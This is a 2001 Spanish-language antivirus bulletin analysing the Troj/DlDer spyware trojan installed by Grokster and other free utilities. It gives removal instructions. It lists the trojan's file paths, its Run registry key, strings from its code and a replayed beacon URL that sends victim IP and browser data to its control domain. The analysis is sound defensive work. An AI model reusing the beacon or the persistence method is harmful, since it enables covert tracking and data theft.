Video Soft BBS


Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Las Noticias
Galería
Chat

Controlado desde el 19/10/97 por NedStat

VSAntivirus   
Esta página es un servicio gratuito de Video Soft BBS - SUBSCRIBASE en nuestras listas de correo.
Es usted nuestro visitante número  desde el 12 de agosto de 1996

Troj/DlDer. Puede instalarlo el Grokster, roba información
 
VSantivirus No. 539 - Año 6 - Sábado 29 de diciembre de 2001

Actualizado 1 de enero de 2002.

Troj/DlDer. Spyware instalado por varias utilidades.

Nombre: Troj/DlDer
Alias: DlDer, Trojan.Win32.DlDer, Troj_DlDer, TROJ_DLDER.A, Trojan/W32.Dlder, W32.DlDer.Trojan, Troj/Download-A.
Tamaño: dlder.exe (40,960 bytes), explorer.exe (31,232 bytes)
Fuente: F-Secure, Symantec, Trend Micro, McAfee y propias.

Grokster es una utilidad gratuita, que hace lo mismo que el conocido Gnutella!, o sea, permite el intercambio Pc a Pc (buscar y descargar) de archivos de audio, video, imágenes, documentos y programas.

Según las últimas investigaciones, Grokster estaría relacionado con un nuevo troyano que desde hace pocos días está circulando por la red, pero no es el único programa involucrado (ver VSAntivirus 542 del 1/ene/02). 

El troyano, escrito en Visual C++, consta de dos partes, y una vez instalado en el sistema del usuario infectado, realiza constantemente actualizaciones de su componente principal (cada 2.5 minutos), conectándose al dominio 2001-007.com, al mismo tiempo que envía allí datos que identifican a la víctima (dirección IP, navegador usado), y todas las direcciones (URLs) de todas las ventanas del explorador que estuvieran activas.

Esto abre un peligroso agujero en la seguridad del sistema infectado, así como viola la privacidad del usuario cuya computadora es infectada. Además, se trata de una situación muy peligrosa, ya que también es capaz de descargar y ejecutar archivos.

El componente principal del troyano tiene el mismo nombre de un archivo legítimo de Windows, Explorer.exe (tenga cuidado con esto si decide eliminarlo en forma manual). Sin embargo su ubicación no es la del verdadero archivo Explorer.exe, sino en un directorio llamado Explorer que a su vez cuelga del directorio de Windows, lugar donde se copia con los atributos de oculto:

C:\WINDOWS\explorer\Explorer.exe

Este es el componente principal, el cuál es constantemente actualizado por la segunda parte del troyano, la que además le da el nombre:

C:\WINDOWS\DlDer.exe

La infección ocurre con la llegada de este componente, el cuál luego descarga y actualiza al verdadero código del caballo de Troya, el falso Explorer.exe.

El troyano modifica el registro para ejecutarse en cada reinicio de Windows: 

HKLM\SOFTWARE\Microsoft\windows\currentversion\run
dlder = C:\WINDOWS\explorer\explorer.exe

Puede ser también:

dlder = C:\WINDOWS\DlDer.exe

También crea esta clave en el registro para almacenar información necesaria para su funcionamiento:

HKLM\SOFTWARE\Games\Clicktilluwin

Se han detectado varios programas que instalan este caballo de Troya (ver VSAntivirus 542 del 1/ene/02).

Uno de los primeros en ser denunciados, es el Grokster, que mencionábamos al principio.

Se instala con uno de sus componentes (clicktilluwin). Pero aunque la instalación de éste es optativa, parece ser que el troyano se instala igual aunque se le indique no hacerlo.

En el código del DLDER.EXE, figura esta referencia:

\SOFTWARE\games\clicktilluwin

Como dijimos, al ejecutarse el DlDer.exe por primera vez, se produce la descarga del Explorer.exe del Web mencionado antes, el cuál se copia a la carpeta WINDOWS\explorer, y luego modifica el registro, para continuar ejecutándose cada vez que se enciende o reinicia la computadora.

El proceso se sigue repitiendo. Conexión al sitio 2001-007.com, reportes de los datos obtenidos en la computadora, robo de todas las direcciones Web visitadas por la víctima, etc.

El componente que se conecta para actualizarse, contiene la siguiente información en su código:

GET /index.asp?User_IP=
www.2001-007.com
userid
127
Netscape Navigator
Internet Explorer_Server
open
IEXPLORE.EXE
http:\\localhost
http:\\127.
&User_URL=
GET /index.asp?User_ID=
http:
Edit

Un examen del sitio, devuelve errores al intentar obtener alguna respuesta (hasta el momento de escribir este reporte, seguía activo).

Algunos de los datos vistos arriba, parecen indicar el tipo de información que se envía, incluida la dirección IP de la víctima. 

AL usar el mismo comando que utiliza el troyano (una llamada a http://www.2001-007.com/index.asp?UserURL=GET+/&User_IP=127.0.0.1&userid=127&User_Browser=IE), se devuelve un valor que va aumentando, presumiblemente un registro de la cantidad de máquinas afectadas.

Cómo borrar manualmente el troyano

Para borrar manualmente el troyano, reinicie Windows en modo a prueba de fallos, como se indica en este artículo:

VSantivirus No. 499 - 19/nov/01
Cómo iniciar su computadora en Modo a prueba de fallos.
http://www.vsantivirus.com/faq-modo-fallo.htm

Luego, siga estos pasos:

1. Seleccione Inicio, Buscar, Archivos o carpetas

2. Teclee EXPLORER.EXE y pulse ENTER

3. Si aparece, SOLAMENTE borre el archivo en esta ubicación (en la carpeta EXPLORER): 

C:\WINDOWS\explorer\Explorer.exe

Tenga en cuenta que C:\WINDOWS\Explorer.exe es el archivo legítimo de Windows (está en la carpeta WINDOWS). ¡No lo borre!...

4. Repita los pasos 1 a 3 para buscar y borrar el siguiente archivo:

DLDER.EXE

5. Seleccione Inicio, Ejecutar, teclee REGEDIT y pulse Enter

6. En el panel izquierdo del editor de registro de Windows, pinche en el signo "+" hasta abrir la siguiente rama:

HKEY_LOCAL_MACHINE
Software
Microsoft
Windows
CurrentVersion
Run

7. Pinche sobre la carpeta "Run". En el panel de la derecha pinche sobre la entrada "dlder" y pulse la tecla SUPR o DEL. Conteste afirmativamente la pregunta de si desea borrar la clave.

8. Use "Registro", "Salir" para salir del editor y confirmar los cambios.

9. Reinicie su computadora (Inicio, Apagar el sistema, Reiniciar).

Notas:

Si el sistema operativo instalado es Windows Me, para poder eliminar correctamente este virus de su computadora, deberá deshabilitar antes de cualquier acción, la herramienta "Restaurar sistema" como se indica en este artículo:

VSantivirus No. 499 - 19/nov/01
Limpieza de virus en Windows Me
http://www.vsantivirus.com/faq-winme.htm


Más información:

VSantivirus No. 542 - 1/ene/02
Varios programas de uso gratuito, instalan troyano DlDer
http://www.vsantivirus.com/01-01-02.htm

VSantivirus No. 547 - 6/ene/02
DlDer, un espía en casa
http://www.vsantivirus.com/06-01-02b.htm


(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

 

Copyright 1996-2002 Video Soft BBS